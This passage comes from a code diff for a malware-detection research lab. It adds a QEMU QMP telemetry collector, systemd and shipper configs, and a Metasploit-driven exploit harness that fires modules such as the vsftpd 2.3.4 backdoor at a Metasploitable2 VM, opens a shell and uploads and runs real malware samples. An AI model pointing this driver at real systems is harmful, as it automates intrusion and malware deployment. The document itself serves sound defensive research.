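from typing import Dict, Iterable, Iterator, Optional, Tuple


def group_by_interval(lines: Iterable[str]) -> Iterator[Tuple[float, Dict[str, int]]]:
    """Yield (interval, {event: value}) once per distinct interval.

    Hypothetical helper. Non-JSON lines and uncountable values
    (for example "<not counted>") are skipped.
    """
    cur: Optional[float] = None
    agg: Dict[str, int] = {}
    for line in lines:
        line = line.strip()
        if not line.startswith("{"):
            continue
        try:
            evt = json.loads(line)
        except json.JSONDecodeError:
            continue
        interval, name = evt.get("interval"), evt.get("event")
        if interval is None or name is None:
            continue
        # A new interval value closes the previous row.
        if cur is not None and interval != cur:
            if agg:
                yield cur, agg
            agg = {}
        cur = interval
        raw = str(evt.get("counter-value")).replace(",", "")
        try:
            agg[name] = int(float(raw))
        except (ValueError, OverflowError):
            pass  # leave the event out of this row
    # End of stream: emit the last, possibly partial, row.
    if cur is not None and agg:
        yield cur, agg
```

Keying the flush on a change in `interval` means a row is only complete once the first event of the next interval has been seen, so the final row is emitted at end of stream rather than on a timer.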
--- a/collectors/qmp.py
+++ b/collectors/qmp.py
@ -0,0 +1,262 @@
+"""Source 2 (oracle): QEMU QMP sampler.
+
+Connects to the QEMU monitor protocol socket exposed by the launcher
+($RUN_DIR/qmp.sock) and periodically queries the hypervisor for
+per-VM stats that don't show up in /proc/<qemu_pid>:
+
+  - per-disk block I/O (rd_bytes, wr_bytes, rd_ops, wr_ops)
+  - VM run state (running / paused / shutdown)
+  - per-netdev tx/rx counters (when available)
+  - KVM stat counters (when available; introspection differs by qemu
+    version, so anything we can't read is skipped silently)
+
+This source is **oracle-only** — it does not exist on a deployed
+device. Every row carries ``available_in_deployment: false``.
+
+Wire format: QMP is line-delimited JSON. The handshake is fixed:
+
+    server  → {"QMP": {"version": {...}, "capabilities": [...]}}
+    client  → {"execute": "qmp_capabilities"}
+    server  → {"return": {}}
+    (client may now issue commands)
+
+We use a dedicated synchronous client because QMP is request/response
+and we don't need pipelining; one query batch per tick keeps the
+on-disk schema simple.
+"""
+
+from __future__ import annotations
+
+import json
+import logging
+import socket
+import threading
+import time
+from dataclasses import dataclass
+from pathlib import Path
+from typing import Any
+
+
+log = logging.getLogger("cis490.collectors.qmp")
+
+SOURCE = "host_qmp"
+AVAILABLE_IN_DEPLOYMENT = False
+
+
+class QMPError(RuntimeError):
+    pass
+
+
+@dataclass
+class _SockReader:
+    sock: socket.socket
+    buf: bytes = b""
+
+    def read_line(self, timeout_s: float = 5.0) -> str:
+        deadline = time.monotonic() + timeout_s
+        while b"\n" not in self.buf:
+            self.sock.settimeout(max(0.1, deadline - time.monotonic()))
+            try:
+                chunk = self.sock.recv(8192)
+            except socket.timeout as e:
+                raise QMPError(f"QMP read timed out: {e}") from e
+            if not chunk:
+                raise QMPError("QMP connection closed by peer")
+            self.buf += chunk
+        line, _, rest = self.buf.partition(b"\n")
+        self.buf = rest
+        return line.decode("utf-8", errors="replace")
+
+
+class QMPClient:
+    """Tiny synchronous QMP client over a unix socket."""
+
+    def __init__(self, socket_path: str | Path) -> None:
+        self.path = str(socket_path)
+        self._sock: socket.socket | None = None
+        self._reader: _SockReader | None = None
+
+    def connect(self, timeout_s: float = 5.0) -> dict[str, Any]:
+        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
+        s.settimeout(timeout_s)
+        s.connect(self.path)
+        self._sock = s
+        self._reader = _SockReader(s)
+        # Read greeting.
+        greeting = json.loads(self._reader.read_line(timeout_s=timeout_s))
+        if "QMP" not in greeting:
+            raise QMPError(f"unexpected QMP greeting: {greeting!r}")
+        # Negotiate capabilities (no flags requested).
+        self.execute("qmp_capabilities")
+        return greeting["QMP"]
+
+    def execute(self, command: str, **arguments: Any) -> Any:
+        if self._sock is None or self._reader is None:
+            raise QMPError("not connected")
+        msg: dict[str, Any] = {"execute": command}
+        if arguments:
+            msg["arguments"] = arguments
+        body = (json.dumps(msg) + "\n").encode("utf-8")
+        self._sock.sendall(body)
+        # QMP can interleave async events with the response — drain
+        # until we see the matching {"return": ...} or {"error": ...}.
+        for _ in range(64):  # bounded to avoid an infinite loop on bugs
+            line = self._reader.read_line()
+            if not line.strip():
+                continue
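+            try:
+                resp = json.loads(line)
+            except json.JSONDecodeError as e:
+                # Surface as QMPError so callers that tolerate QMP
+                # failures also tolerate a garbled reply.
+                raise QMPError(f"{command}: malformed QMP reply: {e}") from e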
+            if "return" in resp:
+                return resp["return"]
+            if "error" in resp:
+                raise QMPError(f"{command}: {resp['error']}")
+            # Otherwise it's an async event; ignore and keep reading.
+        raise QMPError(f"{command}: too many async events without a response")
+
+    # ---- snapshot / revert (via human-monitor-command) -----------------
+
+    def savevm(self, name: str) -> str:
+        """``savevm <name>`` — capture a live VM snapshot inside the
+        qcow2. Returns the monitor's reply (empty string on success).
+        Requires the disk to be qcow2 (our launchers always are)."""
+        return self._hmp(f"savevm {name}")
+
+    def loadvm(self, name: str) -> str:
+        """``loadvm <name>`` — restore the named snapshot. The guest
+        is paused, restored, and resumed; collectors continue
+        sampling and just see a sharp transition."""
+        return self._hmp(f"loadvm {name}")
+
+    def _hmp(self, cmd: str) -> str:
+        out = self.execute("human-monitor-command", **{"command-line": cmd})
+        return out if isinstance(out, str) else ""
+
+    def close(self) -> None:
+        if self._sock is not None:
+            try:
+                self._sock.close()
+            except OSError:
+                pass
+            self._sock = None
+            self._reader = None
+
+
+# ---- row builders ----------------------------------------------------------
+
+
+def _flatten_blockstats(blockstats: list[dict] | None) -> dict[str, dict[str, int]]:
+    """Compact ``query-blockstats`` to ``{device: {rd_ops, wr_ops, ...}}``."""
+    out: dict[str, dict[str, int]] = {}
+    for entry in blockstats or []:
+        name = entry.get("device") or entry.get("qdev") or "unknown"
+        s = entry.get("stats") or {}
+        out[name] = {
+            "rd_ops": int(s.get("rd_operations", 0)),
+            "wr_ops": int(s.get("wr_operations", 0)),
+            "rd_bytes": int(s.get("rd_bytes", 0)),
+            "wr_bytes": int(s.get("wr_bytes", 0)),
+            "flush_ops": int(s.get("flush_operations", 0)),
+        }
+    return out
+
+
+def collect_once(client: QMPClient, t_mono_origin_ns: int) -> dict[str, Any]:
+    row: dict[str, Any] = {
+        "t_mono_ns": time.monotonic_ns() - t_mono_origin_ns,
+        "t_wall_ns": time.time_ns(),
+        "source": SOURCE,
+        "available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
+    }
+
+    # query-status is dirt cheap and tells us whether the guest is
+    # paused (rare) or running.
+    try:
+        status = client.execute("query-status")
+        row["vm_status"] = status.get("status")
+        row["vm_running"] = bool(status.get("running"))
+    except QMPError as e:
+        log.debug("query-status failed: %s", e)
+
+    try:
+        bs = client.execute("query-blockstats")
+        row["blockstats"] = _flatten_blockstats(bs)
+    except QMPError as e:
+        log.debug("query-blockstats failed: %s", e)
+
+    # query-stats is QEMU 7.1+ and the schema varies across versions.
+    # We only ask for KVM stats and tolerate any subset of fields.
+    try:
+        stats = client.execute("query-stats", target="vm")
+        row["kvm_stats"] = _summarize_query_stats(stats)
+    except QMPError as e:
+        log.debug("query-stats not supported: %s", e)
+
+    return row
+
+
+def _summarize_query_stats(stats_resp: list[dict] | dict) -> dict[str, int]:
+    """Reduce ``query-stats`` to a flat name→value map of integer
+    counters. The full payload is verbose and version-specific; we only
+    ever want individual scalar counters downstream."""
+    flat: dict[str, int] = {}
+    items = stats_resp if isinstance(stats_resp, list) else [stats_resp]
+    for entry in items:
+        for s in entry.get("stats", []) or []:
+            name = s.get("name")
+            value = s.get("value")
+            if isinstance(name, str) and isinstance(value, int):
+                flat[name] = value
+    return flat
+
+
+# ---- run loop --------------------------------------------------------------
+
+
+def run_loop(
+    socket_path: str | Path,
+    output_path: Path,
+    t_mono_origin_ns: int,
+    interval_ms: int,
+    stop_event: threading.Event,
+) -> int:
+    """Connect to ``socket_path`` and sample at ``interval_ms`` until
+    ``stop_event`` is set. Returns the number of rows written.
+
+    A single missed sample (transient QMP error) is logged and skipped;
+    five consecutive failures terminate the loop so the episode finishes
+    cleanly rather than hanging on a dead hypervisor."""
+    interval_ns = interval_ms * 1_000_000
+    client = QMPClient(socket_path)
+    try:
+        client.connect(timeout_s=5.0)
+    except (OSError, QMPError) as e:
+        log.warning("QMP connect to %s failed: %s — collector exits cleanly", socket_path, e)
+        return 0
+
+    rows = 0
+    consecutive_failures = 0
+    next_tick = time.monotonic_ns()
+    output_path.parent.mkdir(parents=True, exist_ok=True)
+    try:
+        with output_path.open("a", buffering=1) as f:
+            while not stop_event.is_set():
+                try:
+                    row = collect_once(client, t_mono_origin_ns)
+                    f.write(json.dumps(row) + "\n")
+                    rows += 1
+                    consecutive_failures = 0
+                except (QMPError, OSError) as e:
+                    consecutive_failures += 1
+                    log.warning("QMP sample %d failed: %s", rows, e)
+                    if consecutive_failures >= 5:
+                        log.warning("5 consecutive QMP failures; bailing")
+                        break
+
+                next_tick += interval_ns
+                sleep_ns = next_tick - time.monotonic_ns()
+                if sleep_ns > 0:
+                    stop_event.wait(sleep_ns / 1_000_000_000)
+                else:
+                    next_tick = time.monotonic_ns()
+    finally:
+        client.close()
+    return rows
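
A minimal sketch, outside the diff itself, of the pacing rule `run_loop` applies between samples: advance the deadline by one fixed interval, and if the sample overran it, drop the missed ticks and restart the schedule from the current time. The helper name `next_deadline` and its signature are assumptions made for illustration; the collector inlines this arithmetic and re-reads the clock on overrun instead of reusing `now_ns`.

```python
def next_deadline(next_tick_ns: int, interval_ns: int, now_ns: int) -> tuple[int, float]:
    """Return (new_next_tick_ns, seconds_to_sleep) for a fixed-rate sampler."""
    next_tick_ns += interval_ns
    sleep_ns = next_tick_ns - now_ns
    if sleep_ns > 0:
        # On schedule: sleep until the next tick.
        return next_tick_ns, sleep_ns / 1_000_000_000
    # Overrun: do not try to catch up, resynchronize to the clock instead.
    return now_ns, 0.0


# A 100 ms interval where the sample took 40 ms leaves 60 ms to sleep.
tick, sleep_s = next_deadline(0, 100_000_000, 40_000_000)
print(tick, round(sleep_s, 3))
```

Keeping the deadline arithmetic in integer nanoseconds means the schedule does not drift by the duration of each sample, which is what a plain `sleep(interval)` would do.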
--- a/docs/sources.md
+++ b/docs/sources.md
@ -171,6 +171,10 @@ thing plays in our pipeline.
 - **pycdlib** — pure-Python ISO9660/Joliet/Rock Ridge builder. Used to
  produce the NoCloud cidata ISO without depending on system mkisofs/
  xorriso. https://clalancette.github.io/pycdlib/
+- **msgpack** — binary serialization used by Metasploit's RPC API. The
+  Tier-3 driver speaks msfrpcd's native msgpack-over-HTTPS so we don't
+  pull in a higher-level Metasploit Python client.
+  https://msgpack.org

 ---

--- a/etc/caddy-root.crt
+++ b/etc/caddy-root.crt
@ -0,0 +1,11 @@
+-----BEGIN CERTIFICATE-----
+MIIBpDCCAUqgAwIBAgIRAP15YNZS/guq4ES7RfuBBQQwCgYIKoZIzj0EAwIwMDEu
+MCwGA1UEAxMlQ2FkZHkgTG9jYWwgQXV0aG9yaXR5IC0gMjAyNiBFQ0MgUm9vdDAe
+Fw0yNjA0MjYxMzE5NTZaFw0zNjAzMDQxMzE5NTZaMDAxLjAsBgNVBAMTJUNhZGR5
+IExvY2FsIEF1dGhvcml0eSAtIDIwMjYgRUNDIFJvb3QwWTATBgcqhkjOPQIBBggq
+hkjOPQMBBwNCAASjU+sJ+rLPPtTK5t7MsKa6/WDknumPOgxy7uGwGATkd65cHTjz
+zTH6+0+uJ7LPZFTJoPSB5WVHrEA0veY8AxH5o0UwQzAOBgNVHQ8BAf8EBAMCAQYw
+EgYDVR0TAQH/BAgwBgEB/wIBATAdBgNVHQ4EFgQU8EarYtjVc2EvpYE6OPhDQlYB
+docwCgYIKoZIzj0EAwIDSAAwRQIhANxALV9oKSAC4JEB/w1EctnzMfzLyueBpGoB
+7p5I07LRAiAKQuhNMeTDSK3Qql+IjunH8UPidETNXfyInwMnbzgAaQ==
+-----END CERTIFICATE-----
--- a/etc/cis490-bootstrap.service
+++ b/etc/cis490-bootstrap.service
@ -0,0 +1,44 @@
+[Unit]
+Description=CIS490 mTLS bootstrap endpoint (auto-issue client certs to enrolled lab hosts)
+Documentation=https://maxgit.wg/spectral/CIS490
+After=network-online.target
+Wants=network-online.target
+
+[Service]
+Type=simple
+# Runs as root because the wg-pki CA private key is root-only. The
+# service shells out to issue-cis490-client-cert.sh per mint and
+# never touches anything else under /var/lib.
+User=root
+Group=root
+WorkingDirectory=/opt/cis490
+ExecStart=/opt/cis490/.venv/bin/python -m bootstrap \
+    --listen-host 127.0.0.1 \
+    --listen-port 8446 \
+    --issuer-script /opt/wg-pki/scripts/issue-cis490-client-cert-wrapper.sh \
+    --issued-root /var/lib/wg-pki/issued
+Restart=on-failure
+RestartSec=5
+
+# Hardening — narrower than receiver because this binary's only job
+# is to call openssl + tar via the issuer script, then serve files.
+NoNewPrivileges=true
+PrivateTmp=true
+ProtectSystem=strict
+# /home/max/.env/wg-pki/scripts/ holds the issuer script the wrapper
+# execs. ProtectHome=true and ProtectHome=tmpfs both *hide* /home
+# contents rather than making them read-only, so we leave /home
+# accessible. ProtectSystem=strict still keeps everything outside
+# /var/lib/wg-pki write-protected.
+ProtectHome=no
+ReadWritePaths=/var/lib/wg-pki
+ProtectKernelTunables=true
+ProtectKernelModules=true
+ProtectControlGroups=true
+LockPersonality=true
+RestrictNamespaces=true
+RestrictRealtime=true
+SystemCallArchitectures=native
+
+[Install]
+WantedBy=multi-user.target
--- a/etc/cis490-orchestrator.service
+++ b/etc/cis490-orchestrator.service
@ -1,33 +1,46 @@
 [Unit]
-Description=CIS490 episode campaign runner
+Description=CIS490 lab-host episode orchestrator (fleet mode)
 Documentation=https://maxgit.wg/spectral/CIS490
-After=network-online.target
+# Episodes need KVM. msfrpcd (for Tier 3+) is brought up out-of-band
+# by cis490-msfrpcd.service when installed.
+After=network-online.target wg-quick@wg0.service
 Wants=network-online.target

 [Service]
 Type=simple
 User=cis490
 Group=cis490
-SupplementaryGroups=kvm
 WorkingDirectory=/opt/cis490
-ExecStart=/opt/cis490/.venv/bin/python tools/run_campaign.py \
+# /etc/cis490/lab-host.env is written by scripts/install-lab-host.sh;
+# carries FLEET_HOST_ID, BRIDGE, and any operator-supplied overrides.
+EnvironmentFile=/etc/cis490/lab-host.env
+# Fleet mode: detect host capacity, run that many concurrent episodes
+# per wave with samples drawn from the manifest. Each invocation runs
+# one wave and exits; systemd respawns per Restart= below, giving us
+# a continuous stream of fresh-sample episodes per host. The shipper
+# picks them up as `done.marker` files appear.
+ExecStart=/opt/cis490/.venv/bin/python /opt/cis490/tools/run_fleet.py \
    --data-root /var/lib/cis490/data \
-    --target 100
-Restart=on-failure
-RestartSec=10
+    --manifest /opt/cis490/samples/manifest.toml \
+    --waves 1
+Restart=always
+RestartSec=15

-# Hardening
-NoNewPrivileges=true
-PrivateTmp=false
+# Hardening — explicitly grant CAP_NET_RAW for tcpdump (source 4) and
+# CAP_SYS_ADMIN / CAP_PERFMON for perf (source 3) when the operator
+# enables those. All are inherited by per-episode subprocesses.
+# NoNewPrivileges=false is required because AmbientCapabilities only
+# survives across exec() if NNP is off.
+NoNewPrivileges=false
+PrivateTmp=true
 ProtectSystem=strict
 ProtectHome=true
-ReadWritePaths=/var/lib/cis490 /tmp/cis490-vm /dev/kvm
-ProtectKernelTunables=true
-ProtectKernelModules=true
-ProtectControlGroups=true
-LockPersonality=true
-RestrictRealtime=true
-SystemCallArchitectures=native
+# /tmp is needed for per-slot RUN_DIR (cis490-vm-fleet-<slot>) — the
+# fleet runner stages QEMU's sockets + pidfile there.
+ReadWritePaths=/var/lib/cis490 /tmp
+SupplementaryGroups=kvm
+AmbientCapabilities=CAP_NET_RAW CAP_NET_ADMIN CAP_SYS_ADMIN CAP_PERFMON
+CapabilityBoundingSet=CAP_NET_RAW CAP_NET_ADMIN CAP_SYS_ADMIN CAP_PERFMON CAP_DAC_READ_SEARCH

 [Install]
 WantedBy=multi-user.target
--- a/etc/cis490-shipper.service
+++ b/etc/cis490-shipper.service
@ -1,23 +1,19 @@
 [Unit]
-Description=CIS490 episode shipper
+Description=CIS490 lab-host episode shipper
 Documentation=https://maxgit.wg/spectral/CIS490
-After=network-online.target cis490-orchestrator.service
+# WG must be up before the shipper can reach the receiver.
+After=network-online.target wg-quick@wg0.service
 Wants=network-online.target
+Requires=wg-quick@wg0.service

 [Service]
 Type=simple
 User=cis490
 Group=cis490
 WorkingDirectory=/opt/cis490
-ExecStart=/opt/cis490/.venv/bin/python tools/shipper.py \
-    --data-root /var/lib/cis490/data \
-    --receiver-url https://collector.wg \
-    --host-id lab-host-1 \
-    --ca-bundle /etc/cis490/certs/wg-ca.pem \
-    --client-cert /etc/cis490/certs/lab-host-1.pem \
-    --client-key /etc/cis490/certs/lab-host-1.key
+ExecStart=/opt/cis490/.venv/bin/python -m shipper --config /etc/cis490/lab-host.toml
 Restart=on-failure
-RestartSec=10
+RestartSec=5

 # Hardening
 NoNewPrivileges=true
@ -29,6 +25,7 @@ ProtectKernelTunables=true
 ProtectKernelModules=true
 ProtectControlGroups=true
 LockPersonality=true
+RestrictNamespaces=true
 RestrictRealtime=true
 SystemCallArchitectures=native

--- a/etc/lab-host.toml.example
+++ b/etc/lab-host.toml.example
@ -0,0 +1,50 @@
+# CIS490 lab-host — copy to /etc/cis490/lab-host.toml and edit.
+#
+# This config drives BOTH the orchestrator (which runs episodes) and
+# the shipper (which uploads completed episodes to the central
+# receiver over WG).
+
+# Stable identity for this lab host. Used in the receiver path
+# (/v1/episodes/<host_id>/...) and in the X-Lab-Host header. Pick
+# something short, stable, and DNS-safe — letters, digits, _.- only.
+host_id = "REPLACE_ME"
+
+[paths]
+data_root = "/var/lib/cis490/data"
+samples_store = "/var/lib/cis490/samples/store"
+qcow_image = "/var/lib/cis490/vm/images/metasploitable2.qcow2"
+
+[receiver]
+# The receiver lives behind Caddy on the WG-side collector host. The
+# hostname must resolve over WG (collector.wg in the canonical
+# spectral lab). The wg-pki CA must be on every lab-host so the
+# Caddy-issued internal cert validates.
+url = "https://collector.wg"
+ca_bundle = "/etc/cis490/certs/wg-ca.pem"
+
+# mTLS: leaf cert + private key issued by wg-pki for THIS host_id.
+# Comment these out to fall back to bearer-token auth during early
+# bring-up.
+client_cert = "/etc/cis490/certs/lab-host.pem"
+client_key  = "/etc/cis490/certs/lab-host.key"
+
+# Bearer is optional and is the sole authn only if mTLS isn't yet
+# configured. When both are set, mTLS does the actual authn and the
+# bearer is a belt-and-suspenders check.
+# bearer_token = "REPLACE_ME_WITH_SECRET"
+
+# Set to false ONLY for local-loopback dev against an unsigned cert.
+# verify_tls = true
+
+[shipper]
+scan_interval_s = 5.0
+request_timeout_s = 60.0
+
+[episode]
+baseline_seconds = 30
+infected_seconds = 90
+dormant_seconds = 60
+
+[retention]
+keep_local_for_days = 7
+prune_at_disk_pct = 80
--- a/etc/receiver.toml.example
+++ b/etc/receiver.toml.example
@ -1,6 +1,6 @@
 # CIS490 receiver — copy to /etc/cis490/receiver.toml and edit.

-listen_addr = "127.0.0.1:8443"
+listen_addr = "127.0.0.1:8444"
 store_root = "/var/lib/cis490/episodes"
 incoming_root = "/var/lib/cis490/incoming"
 index_path = "/var/lib/cis490/index.jsonl"
--- a/exploits/README.md
+++ b/exploits/README.md
@ -1,12 +1,92 @@
 # exploits/

-Metasploit resource scripts (`*.rc`) that drive specific exploit modules
-deterministically — same inputs, same module options, every time.
+The Tier-3 exploit driver — fires a Metasploit module against a
+vulnerable target VM, watches for the resulting session, and stamps the
+session-open transition into the episode's `events.jsonl` so the
+labeler can mark `armed → infecting` honestly.

-Each script:
- Sets `RHOSTS` to the guest's bridge IP.
- Sets a payload that opens a session usable for sample upload + execute.
- Avoids any options that introduce randomness in the exploit fire timing
-  (so that the `armed → infecting` transition lands at a predictable offset).
+## Layout

-These scripts pair with public Metasploit modules. We do not author exploits.
+```
+exploits/
+  msfrpc.py           tiny msgpack-over-HTTPS client for msfrpcd
+  driver.py           MSFExploitDriver — plugged in as EpisodeRunner.on_phase
+  modules.py          ModuleConfig + TOML loader
+  modules/
+    vsftpd_234_backdoor.toml   first canned module (Metasploitable2)
+    ...
+```
+
+## Module configs
+
+Each `modules/*.toml` describes one Metasploit module — its path, the
+options to set, and the payload to use. The driver reads these files
+to drive `module.execute` over msfrpc.
+
+```toml
+description = "..."
+[module]
+type = "exploit"                      # exploit | auxiliary | post
+path = "unix/ftp/vsftpd_234_backdoor"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"            # placeholder substituted at runtime
+RPORT = 21
+
+[payload]
+path = "cmd/unix/interact"
+[payload.options]                     # optional
+# LHOST = "{{ target_ip }}"
+
+[session]
+type = "shell"
+```
+
+The only placeholder supported today is `{{ target_ip }}`. Add more in
+`exploits/modules.py::ModuleConfig.render_options` when needed.
+
+## Running
+
+```sh
+# 1. Start msfrpcd locally:
+msfrpcd -P <password> -U msf -a 127.0.0.1 -p 55553
+
+# 2. Drop a vulnerable target image at vm/images/<name>.qcow2 (e.g.
+#    Metasploitable2 — see docs/sources.md for sha256).
+
+# 3. Drive an episode:
+MSFRPC_PASSWORD=<password> uv run python tools/run_tier3_demo.py \
+    --module vsftpd_234_backdoor \
+    --target-port 21 \
+    --data-root data
+```
+
+The episode's `events.jsonl` will contain:
+
+```
+driver_setup        — module + target snapshotted before fire
+exploit_fire        — module.execute issued
+session_open        — new session id observed in session.list
+session_landing_probe — first command response (id) recorded
+sample_executed     — workload kicked off inside the session
+session_dormant     — workload killed
+session_killed      — session.stop at episode end
+```
+
+These pair with the standard phase labels in `labels.jsonl` so a
+downstream loader can reconcile "what the orchestrator scheduled"
+against "what actually happened on the wire".
+
+## Adding a module
+
+1. Drop a TOML at `exploits/modules/<name>.toml` per the schema above.
+2. Pick a payload that works without a callback channel until the
+   `br-malware` bridge is in (see `vm/launch_target.sh` — SLIRP +
+   `restrict=on` blocks reverse-tcp by design). `cmd/unix/interact`
+   and other "session on the same socket" payloads are safe.
+3. Drive a quick check: `uv run python tools/run_tier3_demo.py --module <name>`.
+4. The new module is automatically picked up by `tools/run_tier3_demo.py`
+   via `--module <name>`; no driver code changes needed.
+
+We do **not** author exploits or modify upstream Metasploit code. The
+driver is a pure adapter from the project's phase machine to msfrpc.
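
A minimal sketch, outside the diff itself, of the `{{ target_ip }}` substitution the README describes. The standalone function `substitute_target_ip` is a hypothetical stand-in for `ModuleConfig.render_options`; it covers only the placeholder handling and omits the payload merging the real method performs.

```python
from typing import Any


def substitute_target_ip(options: dict[str, Any], *, target_ip: str) -> dict[str, Any]:
    """Replace the target_ip placeholder in string values; pass other values through."""
    rendered: dict[str, Any] = {}
    for key, value in options.items():
        if isinstance(value, str):
            # Accept the placeholder with or without inner spaces.
            value = value.replace("{{ target_ip }}", target_ip)
            value = value.replace("{{target_ip}}", target_ip)
        rendered[key] = value
    return rendered


print(substitute_target_ip({"RHOSTS": "{{ target_ip }}", "RPORT": 21}, target_ip="10.0.0.5"))
```

Non-string values such as `RPORT = 21` keep their TOML type, so integer options stay integers when they are passed on.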
--- a/exploits/__init__.py
+++ b/exploits/__init__.py
--- a/exploits/driver.py
+++ b/exploits/driver.py
@ -0,0 +1,338 @@
+"""Tier-3 exploit driver.
+
+Plugged into ``EpisodeRunner`` as the ``on_phase`` callback. Translates
+the closed phase enum into msfrpc actions:
+
+  clean             — idle. (no-op; exploit hasn't fired yet)
+  armed             — module loaded + options applied; module fires
+                      with ``module.execute``. Driver records the fire
+                      timestamp via ``emit_event`` so the labeler can
+                      align ``armed`` with what's actually happening.
+  infecting         — poll for a new session; on session_open, run a
+                      one-shot landing command (``id`` or similar) so
+                      we have a clear "session is responsive" event.
+  infected_running  — start observable workload inside the session.
+  dormant           — kill the workload, leave the session alive.
+  reverting         — kill session, snapshot revert handled by caller.
+
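+The core events the driver writes match the schema in
+``docs/data-model.md``: ``exploit_fire``, ``session_open``,
+``sample_executed``, ``session_dormant``, ``session_killed``. Auxiliary
+events (``driver_setup``, ``session_landing_probe``,
+``session_open_timeout``, ``real_binary_*``) are emitted alongside them.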
+
+The driver does NOT author exploits or pick payloads at runtime — those
+choices live in ``exploits/modules/*.toml``. The driver is a pure
+adapter between the phase machine and msfrpc.
+"""
+
+from __future__ import annotations
+
+import logging
+import time
+from dataclasses import dataclass
+from pathlib import Path
+from typing import Callable
+
+from samples.manifest import Sample
+
+from .modules import ModuleConfig
+from .msfrpc import MSFRpcClient, wait_for_new_session
+from .workloads import (
+    ChunkedUpload, Workload, chunked_real_binary_upload,
+    real_binary_workload, workload_for,
+)
+
+
+log = logging.getLogger("cis490.exploits.driver")
+
+EmitEvent = Callable[..., None]
+
+
+@dataclass
+class DriverConfig:
+    target_ip: str
+    session_open_timeout_s: float = 30.0
+    # Driver v1 fallback workload — used only when no Sample is passed
+    # in (Sample-driven runs override these via exploits.workloads).
+    # We keep the v1 path so existing callers keep working unchanged.
+    workload_cmd: str = "yes > /dev/null"
+    workload_kill_cmd: str = "pkill yes; true"
+    # Where staged real-malware binaries live on the lab host.
+    sample_store_root: Path | None = None
+
+
+class MSFExploitDriver:
+    """Phase-to-msfrpc adapter. One instance per episode.
+
+    When constructed with a ``Sample``, the driver dispatches the
+    ``infected_running`` / ``dormant`` workload through
+    ``exploits.workloads`` so the in-session behaviour matches the
+    sample's profile (cpu-saturate, scan-and-dial, io-walk, bursty-c2,
+    low-and-slow, shell-resident). Without a sample, falls back to
+    the v1 single-command workload — useful for the very first
+    Tier-3 smoke runs."""
+
+    def __init__(
+        self,
+        client: MSFRpcClient,
+        module: ModuleConfig,
+        cfg: DriverConfig,
+        emit_event: EmitEvent,
+        *,
+        sample: Sample | None = None,
+    ) -> None:
+        self.client = client
+        self.module = module
+        self.cfg = cfg
+        self.emit = emit_event
+        self.sample = sample
+        # Chunked upload plan (None unless real binary path applies).
+        self._chunked: ChunkedUpload | None = None
+        self.workload: Workload | None = self._resolve_workload(sample)
+
+        self._sessions_seen_at_arm: set[int] = set()
+        self._session_id: int | None = None
+        self._job_id: int | str | None = None
+        self._fired = False
+
+    def _resolve_workload(self, sample: Sample | None) -> Workload | None:
+        """Pick the best workload for this sample:
+          1. real binary (if staged at samples/store/<sha256>) → chunked
+             upload + exec via dedicated dispatch path
+          2. profile mimic from exploits.workloads
+          3. None → driver v1 fallback (yes-loop)
+        """
+        if sample is None:
+            return None
+        if sample.kind == "real" and self.cfg.sample_store_root is not None:
+            bin_path = sample.binary_path(self.cfg.sample_store_root)
+            if bin_path is not None:
+                try:
+                    payload = bin_path.read_bytes()
+                    self._chunked = chunked_real_binary_upload(payload, sample=sample)
+                    # Return a Workload shell so the rest of the driver
+                    # can treat the dispatch uniformly. start_cmd is
+                    # never sent verbatim — _start_workload walks the
+                    # chunked plan instead.
+                    return Workload(
+                        profile=self._chunked.profile,
+                        start_cmd="(chunked-upload-managed-by-driver)",
+                        stop_cmd=self._chunked.stop_cmd,
+                        description=f"Real binary chunked upload+execute "
+                                    f"({len(payload)} bytes, "
+                                    f"{self._chunked.n_chunks} chunks)",
+                    )
+                except OSError as e:
+                    log.warning("could not read real sample %s: %s; falling back", bin_path, e)
+        return workload_for(sample)
+
+    # ---- lifecycle ------------------------------------------------------
+
+    def setup(self) -> None:
+        """Authenticate and snapshot the pre-existing session set so we
+        can recognize a *new* session as the one we just opened."""
+        self.client.login()
+        self._sessions_seen_at_arm = set(self.client.session_list().keys())
+        self.emit(
+            "driver_setup",
+            module=self.module.module_path,
+            payload=self.module.payload_path,
+            target_ip=self.cfg.target_ip,
+            preexisting_sessions=sorted(self._sessions_seen_at_arm),
+            sample=self.sample.name if self.sample else None,
+            sample_kind=self.sample.kind if self.sample else None,
+            sample_sha256=self.sample.sha256 if self.sample else None,
+            workload_profile=self.workload.profile if self.workload else None,
+        )
+
+    def teardown(self) -> None:
+        if self._session_id is not None:
+            try:
+                self.client.session_stop(self._session_id)
+                self.emit("session_killed", session_id=self._session_id)
+            except Exception:
+                log.exception("session.stop on %s", self._session_id)
+        if self._job_id is not None:
+            try:
+                self.client.job_stop(self._job_id)
+            except Exception:
+                log.debug("job.stop on %s (often already gone)", self._job_id)
+        self.client.logout()
+
+    # ---- phase callback -------------------------------------------------
+
+    def set_phase(self, phase: str) -> None:
+        log.info("driver phase -> %s", phase)
+        if phase == "clean":
+            return
+        if phase == "armed":
+            self._fire()
+        elif phase == "infecting":
+            self._await_session()
+        elif phase == "infected_running":
+            self._start_workload()
+        elif phase == "dormant":
+            self._stop_workload()
+        elif phase == "reverting":
+            self.teardown()
+        else:
+            log.warning("unknown phase: %s", phase)
+
+    # ---- actions --------------------------------------------------------
+
+    def _fire(self) -> None:
+        if self._fired:
+            log.debug("module already fired; skipping re-fire")
+            return
+        opts = self.module.render_options(target_ip=self.cfg.target_ip)
+        self.emit(
+            "exploit_fire",
+            module=self.module.module_path,
+            options={k: v for k, v in opts.items() if k != "PASSWORD"},
+        )
+        resp = self.client.module_execute(
+            self.module.module_type, self.module.module_path, opts,
+        )
+        self._job_id = resp.get("job_id")
+        self._fired = True
+
+    def _await_session(self) -> None:
+        if self._session_id is not None:
+            return
+        result = wait_for_new_session(
+            self.client,
+            seen=self._sessions_seen_at_arm,
+            timeout_s=self.cfg.session_open_timeout_s,
+        )
+        if result is None:
+            self.emit(
+                "session_open_timeout",
+                module=self.module.module_path,
+                timeout_s=self.cfg.session_open_timeout_s,
+            )
+            log.warning(
+                "no session opened within %.1fs", self.cfg.session_open_timeout_s,
+            )
+            return
+        sid, info = result
+        self._session_id = sid
+        self.emit(
+            "session_open",
+            session_id=sid,
+            session_type=info.get("type"),
+            tunnel_peer=info.get("tunnel_peer"),
+        )
+        # Landing probe so we have a known-good RTT marker on the wire.
+        try:
+            self.client.session_shell_write(sid, "id")
+            time.sleep(0.5)
